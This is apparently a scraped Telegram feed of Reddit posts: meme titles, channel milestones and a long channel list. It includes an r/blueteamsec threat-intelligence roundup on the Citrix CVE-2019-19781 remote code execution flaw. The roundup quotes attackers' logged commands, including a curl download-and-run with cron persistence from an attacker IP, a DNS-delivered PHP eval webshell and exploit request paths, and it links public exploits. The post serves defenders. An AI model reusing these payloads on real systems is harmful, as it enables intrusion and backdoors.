Woke media strikes again 🤦‍♂️

7.1k upvotes
/r/OkBuddyFresca
2022 Aug 16
https://redd.it/wq92nc
by @r_okbuddyfresca


🎂
🎁 Today @r_okbuddyfresca is 1 year old.
🎉 Congratulations! 🎈

absolutelynotmeirl

41.6k upvotes
/r/absolutelynotme_irl
2019 Dec 31
https://redd.it/ehwhp1
by @notme_irl


🏆 Great achievement!
💪 Milestone of 42 subscribers.

Si dice che ai tempi correva l'anno 2020

3.0k upvotes
/r/Ratorix
2020 Sep 21
https://redd.it/iwwxtc
by @r_Ratorix


🏆 Great achievement!
💪 Milestone of 50 subscribers.

Directed by Robert B. Tikka

4.7k upvotes
/r/islam
2021 Jan 13
https://redd.it/kwlztz
by @r_islam_channel
#islam

🏆 Great achievement!
💪 Milestone of 420 subscribers.

Watson, Stone and Roberts Goddesses!

282 upvotes
/r/ChurchOfEmma
2021 Mar 01
https://redd.it/lv11db
by @r_churchofemma


🎂
🎁 Today @r_churchofemma is 1 year old.
🎉 Congratulations! 🎈

First vs. Second Playthrough

8.6k upvotes
/r/DiscoElysium
2021 Apr 13
https://redd.it/mpsfre
by @r_DiscoElysium
#disco #discoelysium #hardcore #crpg #indiegames

🏆 Great achievement!
💪 Milestone of 10 subscribers.

Don't know if memes are allowed here but here it is

1.9k upvotes
/r/algotrading
2022 Jan 27
https://redd.it/sdmlw7
by @r_algotrading
#algorithmic #trading #trade #stock #market

🎂🎂
🎁 Today @r_algotrading is 2 years old.
🎉 Congratulations! 🎈

META DO NOT POST TRACKING NUMBERS OR SLIPS

You'll potentially reveal both your address and the other person's address along with other identification. We just had incidents where the seller's address, seller's full name, seller's phone number, buyer's address, buyer's full name, and other package-specific information was leaked.

It's a mess to clean up, as other websites archive comments with links, and even after we take down the offending comment, we still have to contact image hosting sites with takedown requests. The posting of this message was delayed until said image hosting site took down the image.

Your post will be removed and other consequences will be handed down. Doxxing someone, intentionally or not, is a serious offense.

43 upvotes
/r/thinkpadsforsale
2020 Apr 16
https://redd.it/g2ngcl
by @rthinkpadsforsale


🎂🎂🎂🎂🎂
🎁 Today @rthinkpadsforsale is 5 years old.
🎉 Congratulations! 🎈

Tamamo no mae

379 upvotes
/r/Tamamo
2021 Jun 11
https://redd.it/nx6nvc
by @r_tamamo
#tamamo #fate #fatego

🎂🎂
🎁 Today @r_tamamo is 2 years old.
🎉 Congratulations! 🎈

Multiple Exploits for CVE-2019-19781 (Citrix ADC/Netscaler) released overnight - prepare for mass exploitation

Last update: January 20 - 07:01 UTC/GMT

Patches Now Out for Some

Updates to 11.1 (11.1 63.15) and 12.0 (12.0 63.13) are now up

Citrix blog post: Vulnerability Update: First permanent fixes available, timeline accelerated

ADC version 12.0: https://www.citrix.com/downloads/citrix-adc/firmware/release-120-build-6313.html

ADC version 11.1: https://www.citrix.com/downloads/citrix-adc/firmware/release-111-build-6315.html

Important

Citrix issued revised updates today

[https://www.citrix.com/blogs/2020/01/17/citrix-updates-on-citrix-adc-citrix-gateway-vulnerability/](https://www.citrix.com/blogs/2020/01/17/citrix-updates-on-citrix-adc-citrix-gateway-vulnerability/)

Fox-IT issued an analysis

https://resources.fox-it.com/rs/170-CAK-271/images/Fox-IT%20Advisory%20on%20Citrix%20vulnerability.pdf

Impact / Root Cause

remote pre-auth arbitrary command execution due to logic vuln i.e. reliable execution possible.

Products affected

Citrix ADC and Citrix Gateway version 13.0 all supported builds
Citrix ADC and NetScaler Gateway version 12.1 all supported builds
Citrix ADC and NetScaler Gateway version 12.0 all supported builds
Citrix ADC and NetScaler Gateway version 11.1 all supported builds
Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds

Amazon Web Services - [https://twitter.com/KevTheHermit/status/1216318333219491840](https://twitter.com/KevTheHermit/status/1216318333219491840)

At midday on January 12th Citrix Netscaler AMIs on AWS are default vulnerable out of the box. The root password is set to the instance ID; that can be read from the metadata URL. You can also "cat /flash/nsconfig/.AWS/instance-id".

Background on the vulnerability

https://nvd.nist.gov/vuln/detail/CVE-2019-19781
[https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/](https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/)

Sigma rules

https://github.com/Neo23x0/sigma/blob/master/rules/web/web\_citrix\_cve\_2019\_19781\_exploit.yml

Snort rules

[https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/](https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/)

Snort/Suricata rules

Present since December 29th - 2029206 - ET EXPLOIT Possible Citrix Application Delivery Controller Arbitrary Code Execution Attempt (CVE-2019-19781) (exploit.rules) in the EmergingThreats
[https://rules.emergingthreats.net/open/](https://rules.emergingthreats.net/open/)

Exploitation Forensic Artifacts

https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/
[https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/](https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/)

Multiple Exploits for CVE-2019-19781 (Citrix ADC/Netscaler) released overnight - prepare for mass exploitation

***Last update:*** January 20 - 07:01 UTC/GMT

**Patches Now Out for Some**

Updates to 11.1 (11.1 63.15) and 12.0 (12.0 63.13) are now up

Citrix blog post: [Vulnerability Update: First permanent fixes available, timeline accelerated](https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/?mkt_tok=eyJpIjoiT1RVME56UXhOak00WWpnMyIsInQiOiI0NG9GcjY4Z09OS3ZKT3BcL21odWp6V25EcmdFR3lwMVNBWmhqTjlpR1hmbzlRSlhIXC9BSXJyK0NNMk9SdEdFMkw4cUl5Mk9MVnBkY1JxSGJLZithVjh3PT0ifQ%3D%3D)

ADC version 12.0: [https://www.citrix.com/downloads/citrix-adc/firmware/release-120-build-6313.html](https://www.citrix.com/downloads/citrix-adc/firmware/release-120-build-6313.html)

ADC version 11.1: [https://www.citrix.com/downloads/citrix-adc/firmware/release-111-build-6315.html](https://www.citrix.com/downloads/citrix-adc/firmware/release-111-build-6315.html)

**Important**

Citrix issued revised updates today

* [https://www.citrix.com/blogs/2020/01/17/citrix-updates-on-citrix-adc-citrix-gateway-vulnerability/](https://www.citrix.com/blogs/2020/01/17/citrix-updates-on-citrix-adc-citrix-gateway-vulnerability/)

Fox-IT issued an analysis

* [https://resources.fox-it.com/rs/170-CAK-271/images/Fox-IT%20Advisory%20on%20Citrix%20vulnerability.pdf](https://resources.fox-it.com/rs/170-CAK-271/images/Fox-IT%20Advisory%20on%20Citrix%20vulnerability.pdf)

**Impact / Root Cause**

remote pre-auth arbitrary command execution due to logic vuln i.e. reliable execution possible.

**Products affected**

* Citrix ADC and Citrix Gateway version 13.0 all supported builds
* Citrix ADC and NetScaler Gateway version 12.1 all supported builds
* Citrix ADC and NetScaler Gateway version 12.0 all supported builds
* Citrix ADC and NetScaler Gateway version 11.1 all supported builds
* Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds

***Amazon Web Services*** *-* [https://twitter.com/KevTheHermit/status/1216318333219491840](https://twitter.com/KevTheHermit/status/1216318333219491840)

At midday on January 12th Citrix Netscaler AMIs on AWS are default vulnerable out of the box. The root password is set to the instance ID; that can be read from the metadata URL. You can also "cat /flash/nsconfig/.AWS/instance-id".

**Background on the vulnerability**

* [https://nvd.nist.gov/vuln/detail/CVE-2019-19781](https://nvd.nist.gov/vuln/detail/CVE-2019-19781)
* [https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/](https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/)

**Sigma rules**

* [https://github.com/Neo23x0/sigma/blob/master/rules/web/web\_citrix\_cve\_2019\_19781\_exploit.yml](https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml)

**Snort rules**

* [https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/](https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/)

**Snort/Suricata rules**

* Present since December 29th - 2029206 - ET EXPLOIT Possible Citrix Application Delivery Controller Arbitrary Code Execution Attempt (CVE-2019-19781) (exploit.rules) in the EmergingThreats
* [https://rules.emergingthreats.net/open/](https://rules.emergingthreats.net/open/)

**Exploitation Forensic Artifacts**

* [https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/](https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/?utm_content=112033384&utm_medium=social&utm_source=twitter&hss_channel=tw-403811306)
* [https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/](https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/)
*

[https://x1sec.com/CVE-2019-19781-DFIR](https://x1sec.com/CVE-2019-19781-DFIR)
* via SSH - [https://twitter.com/cyb3rops/status/1215974764227039238](https://twitter.com/cyb3rops/status/1215974764227039238) (caveat: .. doesn't need to be in the URL in all exploitation scenarios)

​

ssh -t [address] 'grep -r "/../vpns" /var/log/http*'

**Vendor mitigation**

* [https://support.citrix.com/article/CTX267679](https://support.citrix.com/article/CTX267679)
* [https://support.citrix.com/article/CTX267027](https://support.citrix.com/article/CTX267027)

Citrix have now (8pm UTC Jan 11) published when they expect patched builds to be available - from [https://support.citrix.com/article/CTX267027](https://support.citrix.com/article/CTX267027) \- some are saying patches are available already to large clients

* 10.510.5.70.x 31st January 2020
* 11.111.1.63.x 20th January 2020
* 12.012.0.63.x 20th January 2020
* 12.112.1.55.x 27th January 2020
* 13.013.0.47.x 27th January 2020

Citrix blog by their CISO - [https://www.citrix.com/blogs/2020/01/11/citrix-provides-update-on-citrix-adc-citrix-gateway-vulnerability/](https://www.citrix.com/blogs/2020/01/11/citrix-provides-update-on-citrix-adc-citrix-gateway-vulnerability/)

**3rd party mitigation steps / advice**

* [https://www.cyber.gov.au/threats/advisory-2020-001-active-exploitation-critical-vulnerability-citrix-application-delivery-controller-and-citrix-gateway](https://www.cyber.gov.au/threats/advisory-2020-001-active-exploitation-critical-vulnerability-citrix-application-delivery-controller-and-citrix-gateway)
* [https://medium.com/@hungrybytes/mitigation-steps-for-cve-2019-19781-8f88d48770b4](https://medium.com/@hungrybytes/mitigation-steps-for-cve-2019-19781-8f88d48770b4)
* Palo Alto content version 8224 or newer.
* 8224 contains detection code for this CVE and will reset the connection before the vulnerability can be exploited. Resets are visible in the threat logs with a name of "Citrix Application Delivery Controller And Gateway Directory Traversal Vulnerability".
* Fortinet IPS 15.754 has a signature - default action is 'pass' though
* [https://fortiguard.com/encyclopedia/ips/48653](https://fortiguard.com/encyclopedia/ips/48653)
* from the comments by [u/ragogumi](https://www.reddit.com/u/ragogumi/)
* "*Fortinet IPS sig appears to be ineffective at detecting or mitigating. I've seen nothing in IPS logs related to this CVE - and cisagov checker, nessus scans and 3rd party red team attempts have not trigger IPS sensor, regardless of remediation state.*"
* Checkpoint released IPS protection too, 2020-01-12, "Citrix Multiple Products Directory Traversal (CVE-2019-19781)". Default action seems to be "Detect".
* [https://www.checkpoint.com/defense/advisories/public/2019/CPAI-2019-1653.html](https://www.checkpoint.com/defense/advisories/public/2019/CPAI-2019-1653.html)

**Details on how to exploit**

* [https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/](https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/)
* [https://github.com/jas502n/CVE-2019-19781](https://github.com/jas502n/CVE-2019-19781)

**Checkers**

* [https://github.com/cisagov/check-cve-2019-19781](https://github.com/cisagov/check-cve-2019-19781) (USA Government)
* [https://github.com/mekoko/CVE-2019-19781](https://github.com/mekoko/CVE-2019-19781) (Chinese)
* [https://github.com/hackingyseguridad/nmap/blob/master/CVE-2019-19781.nse](https://github.com/hackingyseguridad/nmap/blob/master/CVE-2019-19781.nse) (nmap noscript)
* [https://github.com/cyberstruggle/DeltaGroup/blob/master/CVE-2019-19781/CVE-2019-19781.nse](https://github.com/cyberstruggle/DeltaGroup/blob/master/CVE-2019-19781/CVE-2019-19781.nse) (nmap noscript)
* [https://github.com/lasersharkkiller/noscripts/blob/master/exploits/scanner/cve-2019-19781-scanner.ps1](https://github.com/lasersharkkiller/noscripts/blob/master/exploits/scanner/cve-2019-19781-scanner.ps1) (PowerShell)
*

[https://github.com/ptresearch/Pentest-Detections/tree/master/Citrix\_CVE-2019-19781](https://github.com/ptresearch/Pentest-Detections/tree/master/Citrix_CVE-2019-19781) (Russian - Windows Binary)
* [https://github.com/intrigueio/intrigue-core/blob/master/lib/tasks/vulns/citrix\_netscaler\_rce\_cve\_2019\_19781.rb](https://github.com/intrigueio/intrigue-core/blob/master/lib/tasks/vulns/citrix_netscaler_rce_cve_2019_19781.rb) Added to intrigue-core a week or so ago and then improved it when additional details came out by [u/jcran](https://www.reddit.com/u/jcran/)
* [https://medium.com/@securestep9/detecting-citrix-cve-2019-19781-with-owasp-nettacker-c460c5912c77](https://medium.com/@securestep9/detecting-citrix-cve-2019-19781-with-owasp-nettacker-c460c5912c77) OWASP's
* [https://github.com/x1sec/citrixmash\_scanner](https://github.com/x1sec/citrixmash_scanner)

**Commercial Checkers**

* [https://www.tenable.com/blog/cve-2019-19781-exploit-noscripts-for-remote-code-execution-vulnerability-in-citrix-adc-and](https://www.tenable.com/blog/cve-2019-19781-exploit-noscripts-for-remote-code-execution-vulnerability-in-citrix-adc-and) Tenable's

**Exploits**

* [https://github.com/projectzeroindia/CVE-2019-19781](https://github.com/projectzeroindia/CVE-2019-19781)
* [https://github.com/ianxtianxt/CVE-2019-19781](https://github.com/ianxtianxt/CVE-2019-19781)
* [https://github.com/trustedsec/cve-2019-19781/blob/master/citrixmash.py](https://github.com/trustedsec/cve-2019-19781/blob/master/citrixmash.py)
* [https://github.com/jas502n/CVE-2019-19781/blob/master/CVE-2019-19781.py](https://github.com/jas502n/CVE-2019-19781/blob/master/CVE-2019-19781.py)
* [https://github.com/rapid7/metasploit-framework/pull/12816/commits/50637d0d917a78f5eba5281f634df0af314d8d55](https://github.com/rapid7/metasploit-framework/pull/12816/commits/50637d0d917a78f5eba5281f634df0af314d8d55)
* [https://github.com/Jabo-SCO/Shitrix-CVE-2019-19781/blob/master/README.md](https://github.com/Jabo-SCO/Shitrix-CVE-2019-19781/blob/master/README.md)
* Exploitation possible with two GETs
* [https://twitter.com/mpgn\_x64/status/1216792205723041795](https://twitter.com/mpgn_x64/status/1216792205723041795)
* Exploitation possible without directory traversal
* [https://twitter.com/mpgn\_x64/status/1216802182760226817](https://twitter.com/mpgn_x64/status/1216802182760226817)

**Post Exploitation**

* [dozer.nz/citrix-decrypt/](https://t.co/xqCq1qHlp7?amp=1)

**Vulnerability Intelligence**

* [https://www.shodan.io/](https://www.shodan.io/) query: 'vuln:cve-2019-19781'
* [https://badpackets.net/over-25000-citrix-netscaler-endpoints-vulnerable-to-cve-2019-19781/](https://badpackets.net/over-25000-citrix-netscaler-endpoints-vulnerable-to-cve-2019-19781/) \- 25,000 endpoints vuln
* Alternate data sets as of 18:00 on the 12th suggest more

**Honeypot**

* [https://github.com/MalwareTech/CitrixHoneypot](https://github.com/MalwareTech/CitrixHoneypot)

**Exploitation Intelligence**

* Mass Scanning / Exploitation Observed on Jan 12th - [https://twitter.com/bad\_packets/status/1216291048185421830](https://twitter.com/bad_packets/status/1216291048185421830)
* Mass Exploitation Observed on Jan 10th - [https://twitter.com/bad\_packets/status/1215431625766424576](https://twitter.com/bad_packets/status/1215431625766424576)
* GreyNoise tagging - [https://twitter.com/GreyNoiseIO/status/1215818626055528453](https://twitter.com/GreyNoiseIO/status/1215818626055528453)
* [https://viz.greynoise.io/query/?gnql=cve%3Acve-2019-19781](https://viz.greynoise.io/query/?gnql=cve%3Acve-2019-19781)
* SANS honeypot uptick -
* 15:42 UTC Jan 11 - [https://twitter.com/sans\_isc/status/1216022602436808704](https://twitter.com/sans_isc/status/1216022602436808704)
* 4:46 UTC Jan 11 - [https://twitter.com/sans\_isc/status/1215857528749338624](https://twitter.com/sans_isc/status/1215857528749338624)
* Blog:

[https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/](https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/)
* SANS observed payloads
* [https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+Overview+of+Observed+Payloads/25704/](https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+Overview+of+Observed+Payloads/25704/)
* SANS observe crypto miners on January 12th
* [https://twitter.com/sans\_isc/status/1216375320846176261](https://twitter.com/sans_isc/status/1216375320846176261)
* TrustedSec Honeypot analysis
* [https://www.trustedsec.com/blog/netscaler-honeypot/](https://www.trustedsec.com/blog/netscaler-honeypot/)
* AlienVault OTX pulse - [https://otx.alienvault.com/pulse/5e1c293e07c770f36d232489](https://otx.alienvault.com/pulse/5e1c293e07c770f36d232489)
* FireEye - [https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html](https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html)
* FireEye - NOTROBIN - [https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html](https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html)
* German Government [https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove\_bds/](https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove_bds/)

**Doozer Exploitation Intelligence**

[https://twitter.com/michel228/status/1216771783656910849](https://twitter.com/michel228/status/1216771783656910849)

Found this in the logs:

curl http://NN.NN.NN.NN:8081/2a9c665438cd0c8a9c4a25b2a6e0885f -o /tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo "* * * * * /var/nstmp/.nscache/httpd" | crontab -; /tmp/.init/httpd &"

Payload dropped hash (SHA256): 177c3d8389c71065c2ff2e74ab190486ade95869f6655a1e544f5ee41334517e

This is a 2MB implant written in Go - uses AES, persistence via Cron etc.

[u/undermyne](https://www.reddit.com/u/undermyne/) **Exploitation Intelligence**

*I just spent a few hours cleaning up an exploited VPX for a customer. As observed below, the ns.conf was compromised (copied and I assume the copy was grabbed). The passwd file was also taken (nothing of import in that one) and the* *personalbookmark.pl* *file was modified. Following cleanup there were 5 active processes running under nobody and one of them would automatically restart. To be safe I reverted to a backup from prior to the exploit being released. Patched and returned to service and all is well. If the bind logs indicate that a file was deleted you can find the deleted file in the /var/tmp/netscaler/portal/templates directory (or other relevant tmp folders). The XML files are your best bet at trying to figure out what was attempted. Thankfully the 9 attempts on the one I just fixed looked like they were basically trying to sort out what they could and couldn't do. Start with the httpaccess log, then use time stamps to search bind logs, and then see what was done with the xml.ttc2 files in the tmp folders.*

**NCC Group/Fox-IT Exploitation Intelligence**

* Actor 1 observed January 11th we can see exploiting this vulnerability has the following log patterns (where the filename is a random alpha upper/lower case .xml). The attacker is observed using cron for persistence.
* Actor 1 observed January 12th changed their payload to drop a binary called netscalerd which is a coinminer
* [https://www.virustotal.com/gui/file/20343854b8c348146bf17fe739ce9028a620f93116438291f1b0b89345e18520/detection](https://www.virustotal.com/gui/file/20343854b8c348146bf17fe739ce9028a620f93116438291f1b0b89345e18520/detection)

​

POST /vpn/../vpns/portal/noscripts/newbm.pl GET/vpn/../vpns/portal/XIaoLBFveLyvUfUGiWAwElIJNERhpmrBM.xml

* Actor 2 observed January 13 around 15:30 UTC (not clear if someone is

trolling)

​

./var/tmp/netscaler/portal/templates/REDACTED.xml.ttc2: $output .= $stash->get(['template', 0, 'new', [ { 'BLOCK' => 'exec(\'dig cmd.irannetworkteam.org txt|tee /var/vpn/themes/login.php | tee /netscaler/portal/templates/REDACTED.xml\');' } ]]);

for the domain

Domain Name: IRANNETWORKTEAM.ORG Registry Domain ID: D402200000012341868-LROR Registrar WHOIS Server: whois.namesilo.com Registrar URL: www.namesilo.com Updated Date: 2020-01-11T14:17:00Z Creation Date: 2020-01-11T13:46:37Z

the TXT record for the domain currently returns

> set querytype=TXT > cmd.IRANNETWORKTEAM.ORG Non-authoritative answer: cmd.IRANNETWORKTEAM.ORG text = "<?php @eval(base64_decode(strrev(@$_POST[REDACTED])));?>"

So

* pull first stage from DNS TXT field
* uploads second/dynamic stage via POST in specific variable

This post is curated by the team at NCC Group/Fox-IT - [https://www.nccgroup.trust/](https://www.nccgroup.trust/uk/)

206 upvotes
/r/blueteamsec
2020 Jan 11
https://redd.it/en4m7j
by @r_blueteamsec


🎂🎂
🎁 Today @r_blueteamsec is 2 years old.
🎉 Congratulations! 🎈

Live Betting - Live discussion for all your bets

Live Betting - Live discussion for all your bets

237 upvotes
/r/SoccerBetting
2022 Dec 28
https://redd.it/zx4oro
by @rsoccerbetting


🎂🎂🎂🎂🎂
🎁 Today @rsoccerbetting is 5 years old.
🎉 Congratulations! 🎈

Jared, the man behind the famous South Park WoW cosplay has passed away due to Covid-19. RIP
https://www.youtube.com/watch?v=C3I4wpHshuw&ab_channel=mirrodin14

148.1k upvotes
/r/videos
2021 Jan 03
https://redd.it/kpw1i4
by @redditvideos


🎂🎂🎂🎂🎂
🎁 Today @redditvideos is 5 years old.
🎉 Congratulations! 🎈

🔥 This seal has reached peak level of chill

102.9k upvotes
/r/NatureIsFuckingLit
2021 Jun 03
https://redd.it/nrote1
by @NatureIsLit


🏆 Great achievement!
💪 Milestone of 666 subscribers.

Weekend news

🎉 Welcome to newly active channels: @indiandankmemesreddit, @r_RedDeadOnline, @reddit_infographic. 🎈🎈

🏆 Channel of the week: @r_persona5. Join and enjoy!

🔥 Hottest channels of the week: @r_combatfootage, @r_propagandaposters, @loliconsunite.

🙋
Q: How can I help?
A: Support us on Patreon and promote your favorite channels!

Q: How to make similar channels?
A: Ask at @r_channels or use manual at https://github.com/Fillll/reddit2telegram.

Q: Where to donate?
A: Patreon: https://www.patreon.com/reddit2telegram. Other ways: https://bit.ly/r2t_donate.

⬇️ All active channels:
01. @r_gifs
02. @r_jokes
03. @r_funny
04. @datascientology
05. @asiangirlsbeingcute
06. @r_behindthegifs
07. @pythondaily
08. @r_bitcoin
09. @RedditHistory
10. @news756
11. @r_pics_redux
12. @RedditCats
13. @r_til
14. @awwnime
15. @r_mlp
16. @ya_metro
17. @r_Showerthoughts
18. @r_me_irl
19. @r_dankmemes
20. @r_HighQualityGifs
21. @PoliticalHumor
22. @OldSchoolCool
23. @rddit
24. @denpasong
25. @reddit_all
26. @r_AskReddit
27. @r_explainmelikeimfive
28. @r_changemyview
29. @just_hmmm
30. @programmer_humor
31. @dailyfoodporn
32. @r_overwatch
33. @r_cryptocurrency
34. @r_listentothis
35. @r_ramen
36. @r_fantheories
37. @r_SlimeRancher
38. @r_googleplaydeals
39. @Indiancelebs
40. @r_pcmasterrace
41. @GIFFFs
42. @r_wow
43. @r_minecraft
44. @r_wholesomememes
45. @r_streetwear
46. @BetterEveryLoop
47. @reddit_fashion
48. @r_opensignups
49. @r_BigAnimeTiddies
50. @r_Damnthatsinteresting
51. @fakealbumcovers
52. @dash_cams
53. @r_mild
54. @r_porn
55. @r_formula1
56. @r_cpp
57. @r_gaming
58. @r_dontdeadopeninside
59. @r_linux
60. @reddit_android
61. @r_TechSupportGore
62. @r_indiaa
63. @r_dndgreentext
64. @r_dndmemes
65. @r_chemicalreactiongifs
66. @r_wheredidthesodago
67. @r_SwitchHacks
68. @r_books
69. @r_suggest
70. @r_space
71. @r_wasletztepreis
72. @r_greentext
73. @r_crappyoffbrands
74. @r_chemistry
75. @r_vim
76. @r_talesfromtechsupport
77. @r_PewdiepieSubmissions
78. @r_disneyvacation
79. @R_Punny
80. @r_mapporn
81. @r_softwaregore
82. @r_crappydesign
83. @r_comics
84. @r_remotejs
85. @streetmoe
86. @r_foxes
87. @r_digimon
88. @r_furry
89. @r_ik_ihe
90. @r_mildlyinfuriating
91. @r_Animemes
92. @r_wellthatsucks
93. @rtf2memes
94. @r_arma
95. @r_grandorder
96. @r_2meirl4meirl
97. @r_photoshopbattles
98. @r_pornhubcomments
99. @r_animeirl
100. @indepthstories

101. @r_osugame
102. @r_FreeGamesOnSteam
103. @reddit_cartoons
104. @r_technope
105. @rcarporn
106. @r_desktops
107. @r_vinyl
108. @r_creepy
109. @r_HentaiMemes
110. @rareinsults
111. @r_sbubby
112. @loliconsunite
113. @r_privacy
114. @r_WikiLeaks
115. @reddit_androiddev
116. @proceduralgeneration
117. @r_gtaonline
118. @ichimechtenleben
119. @IngressPrimeFeedback
120. @soccer_reddit
121. @r_reddevils
122. @NFL_reddit
123. @r_texans
124. @r_xxxtentacion
125. @r_quotesporn
126. @r_getmotivated
127. @r_Podcasts
128. @r_imaginary_network
129. @r_MaxEstLa
130. @r_SelfHosted
131. @r_InternetIsBeautiful
132. @r_thinkpadsforsale
133. @redditvideos
134. @rsoccerbetting
135. @r_xboxone
136. @LivestreamFail
137. @facepalmers
138. @r_ComedyCemetery
139. @r_latestagecapitalism
140. @ShitLiberalsSay
141. @redditpiracy
142. @r_ContraPoints
143. @IngressReddit
144. @YoutubeCompendium
145. @oddly_satisfy
146. @jenkinsci
147. @redditart
148. @r_interestingasfuck
149. @r_RimWorld
150. @r_woooosh
151. @instant_regret
152. @r_djs
153. @r_marvelstudios
154. @r_creepyasterisks
155. @AllTwitter
156. @r_TIHI
157. @r_therewasanattempt
158. @r_WatchPeopleDieInside
159. @r_youtubehaiku
160. @sub_eminem
161. @r_jailbreak
162. @reddit2telegram
163. @r_shittyramen
164. @bestoftweets
165. @blackpeopletweets
166. @whitepeopletweets
167. @r_trackers
168. @r_vault_hunters
169. @r_CoolGithubProjects
170. @r_evilbuildings
171. @r_linuxmemes
172. @r_BlackMagicFuckery
173. @Rattit
174. @r_engrish
175. @coolguides
176. @r_climbing
177. @r_climbingcirclejerk
178. @tyingherhairup
179. @r_designporn
180. @r_cricket
181. @r_LiverpoolFC
182. @r_econ
183. @r_animearmpits
184. @r_megane
185. @rSurrealMemes
186. @r_thinkpad
187. @r_apple
188. @r_funnystories
189. @r_shitposters_paradise
190. @r_nottheonion
191. @r_izlam
192. @GGPoE
193. @r_terraria
194. @r_breadtube
195. @r_war
196. @r_cutelittlefangs
197. @admeme
198. @r_channels_tifu
199. @r_vinesauce
200. @r_freegamefindings